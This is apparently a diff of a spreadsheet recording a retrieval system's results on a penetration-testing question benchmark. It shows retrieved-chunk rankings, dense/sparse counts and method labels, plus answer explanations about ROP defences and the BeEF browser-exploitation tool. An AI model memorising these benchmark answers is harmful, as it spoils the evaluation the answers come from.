+Explanation: Control Flow Integrity (CFI) is specifically designed to protect systems against Return-Oriented Programming (ROP) attacks. CFI works by ensuring that the control flow graph (CFG) of a program, established at compile time, is adhered to, thus making exploitation through unexpected execution paths, such as those leveraged in ROP attacks, much more difficult. Stack canaries are used to detect buffer overflow attacks but do not specifically prevent ROP attacks. Address Space Layout Randomization (ASLR) makes it harder for attackers to predict memory addresses, which does hinder ROP attacks but does not prevent them outright. Executable Space Protection is a general term referring to the prevention of code execution from non-executable memory regions like the stack, which is a prerequisite for ROP attacks but not a specific defense against them.</t>
         </is>
       </c>
       <c r="G90" t="inlineStr">
@@ -6445,9 +6446,9 @@
 preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e62a2b2b-31c7-42d4-91f0-d8e3c1852d64, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f837578d-950d-4f8c-8074-42d97208fc1f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f837578d-950d-4f8c-8074-42d97208fc1f, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 7920f5e1-2a4b-4504-8b29-237fe6a6f0e8, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I90" t="inlineStr">
@@ -6460,7 +6461,7 @@
       </c>
       <c r="K90" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6512,14 +6513,14 @@
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: ed71a0e0-bbee-4624-8615-8f7108af7d8d, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 3d55cf32-7fea-4fec-a92c-cade6640d08d, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 0407d467-a3d5-4e44-8abc-61125edf63c7, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I91" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J91" t="n">
@@ -6527,7 +6528,7 @@
       </c>
       <c r="K91" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6584,15 +6585,15 @@
 preemware_pentestingeval.pdf (Chunk: b96549cf-2f25-40ce-8da2-f5c771be36cd, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 885d670c-13eb-480a-b114-6464cb752c48, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I92" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J92" t="n">
@@ -6600,7 +6601,7 @@
       </c>
       <c r="K92" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6651,15 +6652,15 @@
 preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 93d14658-5b22-4616-b6e7-c1d7e8d2504c, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: ed0ba5f3-2b68-477d-b01e-8dc5589ac689, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I93" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J93" t="n">
@@ -6667,7 +6668,7 @@
       </c>
       <c r="K93" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6719,14 +6720,14 @@
 preemware_pentestingeval.pdf (Chunk: c63b7be0-9513-4094-b110-716268eb972f, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 30af0826-c4eb-444a-8c3b-d68a8930228c, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: d97e1711-53ab-44ca-af62-a56a0d80cec8, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d339234f-f7a5-4320-b995-1444d77980bb, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 059b3869-a244-492c-a64b-ef620b6bf3c4, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 8b80403b-5bc0-4b8e-8246-dc7a15db7a9f, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I94" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J94" t="n">
@@ -6734,7 +6735,7 @@
       </c>
       <c r="K94" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6781,11 +6782,11 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: f10ff4de-8adf-4b9b-a49e-df2721541289, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: cf80c07b-fe86-4871-a4bc-f2d865272046, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4257a5ee-b63b-4294-91fd-f85470b5dae2, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 8a4f9a51-1702-4d08-a48a-dd5b12cac7e8, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 5677865b-0913-4882-b22d-8953304cb0af, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 08b874c5-403c-40bb-98c9-b933ea5735a6, Type: dense, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 10)</t>
@@ -6793,7 +6794,7 @@
       </c>
       <c r="I95" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J95" t="n">
@@ -6801,7 +6802,7 @@
       </c>
       <c r="K95" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6846,21 +6847,21 @@
       </c>
       <c r="H96" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 2)
+          <t>preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 1)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: ac04819c-308e-427d-be42-4bffc6fce7a5, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 20364b0e-e2d9-4399-be28-1448664a28eb, Type: sparse, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 75597556-2c3f-4be1-9936-b0a9d82dd4df, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I96" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J96" t="n">
@@ -6868,7 +6869,7 @@
       </c>
       <c r="K96" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6903,7 +6904,7 @@
       <c r="F97" t="inlineStr">
         <is>
           <t>Answer: BeEF (Browser Exploitation Framework)
-Explanation: BeEF is specifically designed for exploiting web browsers through client-side attacks. This tool provides a variety of command modules that can leverage vulnerabilities in the browser to control managed browsers. On the other hand, Metasploit Framework, while versatile in conducting a range of penetration testing activities including client-side attacks, is not specialized just for browser exploitation. Burp Suite is primarily used for assessing the security of web applications but does not specialize in browser exploitation itself. Wireshark is a network protocol analyzer used for network troubleshooting, analysis, software and communications protocol development, and education, but not specifically for exploiting web browsers.</t>
+Explanation: BeEF is specifically designed for exploiting web browsers through client-side attacks. It provides a variety of command modules that can leverage vulnerabilities in web browsers to control managed browsers. On the other hand, Metasploit Framework, Burp Suite, and Wireshark are not specialized just for browser exploitation.</t>
         </is>
       </c>
       <c r="G97" t="inlineStr">
@@ -6917,17 +6918,17 @@
 preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 78887914-a26a-430c-bd9c-f955b8884feb, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 8741919d-841b-47ab-a119-1bb63d066d47, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: cb888b97-65fc-4308-b210-258c964a394e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: a7b7c8da-d77a-4332-83f4-858823f9b832, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: bde046e7-1e88-444d-8a5d-09f26bea8c82, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c722d3b3-3a6b-4c5c-ab92-a795ce66e638, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I97" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J97" t="n">
@@ -6935,7 +6936,7 @@
       </c>
       <c r="K97" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -6982,19 +6983,19 @@
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: d175cfd5-e779-4122-ad9c-10aeb562c1b8, Type: dense, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: acf48ab4-50fb-4cbb-99bd-66d6a3e9f820, Type: dense, Rank: 2)
-preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: dense, Rank: 3)
+preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 04aa2064-124c-4113-89e7-06ca51cd9ed2, Type: sparse, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: ad4b64b8-0cf3-4dbd-9bd5-c817917d0c9d, Type: sparse, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 556b101a-99fc-4aaa-a621-3b452315891e, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I98" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 5, Total: 10</t>
         </is>
       </c>
       <c r="J98" t="n">
@@ -7002,7 +7003,7 @@
       </c>
       <c r="K98" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7048,11 +7049,11 @@
       <c r="H99" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: aa428684-852d-4d02-bc06-338f87060720, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 2)
 cowWhySo-pentest-redteam-steering.md (Chunk: 2ef34fed-876a-4bba-9f8e-65bab748e678, Type: dense, Rank: 3)
 cowWhySo-pentest-redteam-steering.md (Chunk: 10ab44a6-b630-4fae-84ce-4a34439d57b4, Type: dense, Rank: 4)
-cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: dense, Rank: 5)
-adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md (Chunk: 6e810983-986e-482b-8ece-27564c73c29a, Type: dense, Rank: 6)
+cowWhySo-pentest-redteam-steering.md (Chunk: 4d83f0d6-b826-4259-8ed2-4b776d900a97, Type: sparse, Rank: 5)
+adcs-+-petitpotam-ntlm-relay-obtaining-krbtgt-hash-with-domain-controller-machine-certificate.md (Chunk: 6e810983-986e-482b-8ece-27564c73c29a, Type: sparse, Rank: 6)
 cowWhySo-pentest-redteam-steering.md (Chunk: a51a6d26-c177-466b-aa2a-5de8d47c5fe0, Type: dense, Rank: 7)
 cowWhySo-pentest-redteam-steering.md (Chunk: f9bf9901-c3d6-4172-925b-486e460b1f29, Type: dense, Rank: 8)
 cowWhySo-pentest-redteam-steering.md (Chunk: aca97c00-7481-40df-8227-dd2dd01a89d2, Type: dense, Rank: 9)
@@ -7061,7 +7062,7 @@
       </c>
       <c r="I99" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 7, Keyword: 3, Total: 10</t>
         </is>
       </c>
       <c r="J99" t="n">
@@ -7069,7 +7070,7 @@
       </c>
       <c r="K99" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7122,13 +7123,13 @@
 preemware_pentestingeval.pdf (Chunk: dbd9551c-209f-4286-a6ee-99530ee8bc83, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: sparse, Rank: 9)
 cowWhySo-pentest-redteam-steering.md (Chunk: 1341b7ef-18b4-4f51-93c8-22accef7ff54, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I100" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J100" t="n">
@@ -7136,7 +7137,7 @@
       </c>
       <c r="K100" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7181,21 +7182,21 @@
       </c>
       <c r="H101" t="inlineStr">
         <is>
-          <t>preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 1)
+          <t>preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: sparse, Rank: 1)
 preemware_pentestingeval.pdf (Chunk: e62a2b2b-31c7-42d4-91f0-d8e3c1852d64, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: bd060a5f-5589-43ad-a132-ad7efb593ba8, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: dense, Rank: 7)
+preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: sparse, Rank: 7)
 cowWhySo-pentest-redteam-steering.md (Chunk: 161bbefa-f921-4138-90fe-7697803bdba8, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5bcad625-27ff-4c5d-acb6-97686598c38f, Type: sparse, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I101" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 6, Keyword: 4, Total: 10</t>
         </is>
       </c>
       <c r="J101" t="n">
@@ -7203,7 +7204,7 @@
       </c>
       <c r="K101" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7256,13 +7257,13 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: dense, Rank: 9)
+preemware_pentestingeval.pdf (Chunk: 8ca97934-8ec1-4feb-ba02-b9ded5c5a566, Type: sparse, Rank: 9)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 10)</t>
         </is>
       </c>
       <c r="I102" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 9, Keyword: 1, Total: 10</t>
         </is>
       </c>
       <c r="J102" t="n">
@@ -7270,7 +7271,7 @@
       </c>
       <c r="K102" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7322,14 +7323,14 @@
 preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: sparse, Rank: 10)</t>
         </is>
       </c>
       <c r="I103" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J103" t="n">
@@ -7337,7 +7338,7 @@
       </c>
       <c r="K103" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7383,9 +7384,9 @@
       <c r="H104" t="inlineStr">
         <is>
           <t>preemware_pentestingeval.pdf (Chunk: 69250b66-f38a-4bf6-9f09-e3c676c2c002, Type: dense, Rank: 1)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: dense, Rank: 2)
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 3)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 4)
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: sparse, Rank: 4)
 preemware_pentestingeval.pdf (Chunk: 99c75208-0347-4943-851b-17857ce42681, Type: dense, Rank: 5)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 7)
@@ -7396,7 +7397,7 @@
       </c>
       <c r="I104" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 8, Keyword: 2, Total: 10</t>
         </is>
       </c>
       <c r="J104" t="n">
@@ -7404,7 +7405,7 @@
       </c>
       <c r="K104" t="inlineStr">
         <is>
-          <t>Hybrid Search + Reranking + Query Enhancement</t>
+          <t>Hybrid Search + Reranking</t>
         </is>
       </c>
     </row>
@@ -7453,17 +7454,17 @@
 preemware_pentestingeval.pdf (Chunk: 98a0a4b0-83b8-4181-ac2e-6cdf5bbb1ea1, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 6)
+preemware_pentestingeval.pdf (Chunk: 831f9734-1696-4ce4-bc1c-6b14be8556f2, Type: sparse, Rank: 5)
+preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: sparse, Rank: 6)
 preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: dense, Rank: 8)
+preemware_pentestingeval.pdf (Chunk: 37cafc74-ea7a-4ffa-8b89-f7a19624e678, Type: sparse, Rank: 8)
 preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 9)
